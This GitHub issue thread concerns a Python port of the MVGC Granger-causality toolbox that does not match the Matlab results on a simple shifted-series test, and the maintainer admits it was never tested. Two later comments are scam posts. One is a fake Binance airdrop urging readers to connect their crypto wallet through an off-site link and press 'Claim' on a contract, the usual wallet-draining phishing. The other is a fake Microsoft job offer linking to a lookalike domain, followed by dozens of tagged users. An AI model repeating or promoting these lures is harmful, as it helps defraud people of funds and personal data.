### ISSUE TITLE
Is this maintained? It does not reproduce the Matlab version on simple test

### ISSUE THREAD

**Issue by franklanfranchi** [hijoe320/MVGC#1]
We tried to use this module to calculate F_Granger for a simple situation where X is an identical copy of Y shifted by 3 time steps. Calculating F_Granger should yield approx. 0 when q < 3 and a large number when q>=3. That is in fact what we see from the Matlab toolbox. However, the same code running against this python module does not yield that result. Are we missing something? 
Thanks for any pointers!

**Comment by hijoe320** [comment]
nope, not tested since I don't have Matlab installed when wrote this code, bug fix welcome.

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by ThuretGbenougan** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online). Hurry, applications close on [March 1, 2024](https://jobsindeed.online).

## Job Description:
- **Position:** Senior Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan with dental and vision coverage
  - Company-contributed retirement plan with matching
  - Flexible working hours and work-from-home options
  - Generous paid time off and parental leave policies
  - Professional development opportunities and training support
  - Collaborative and inclusive work environment

## Requirements:
- Minimum of 5 years of experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Extensive experience with frameworks such as React, Angular, or Vue.js
- Strong problem-solving skills and ability to work in a fast-paced environment
- Excellent communication and teamwork skills

**Note:** This position is open to candidates from anywhere in the world. Don't miss this opportunity to join a dynamic team at Microsoft and make a significant impact in the tech industry!
pulsational, @POCHI-CUTE, @francesco-plt, @rjohns03, @HZongLin, @Jerjer3333333, @omartufayl, @Swifilaboroka, @zanganken, @echo-ht, @lalego, @HelloJo44, @mattrudo, @arturoller, @Tuurash, @paliwalparitosh, @wdwlrz, @AlpoxDev, @bozzlab, @wyshiko
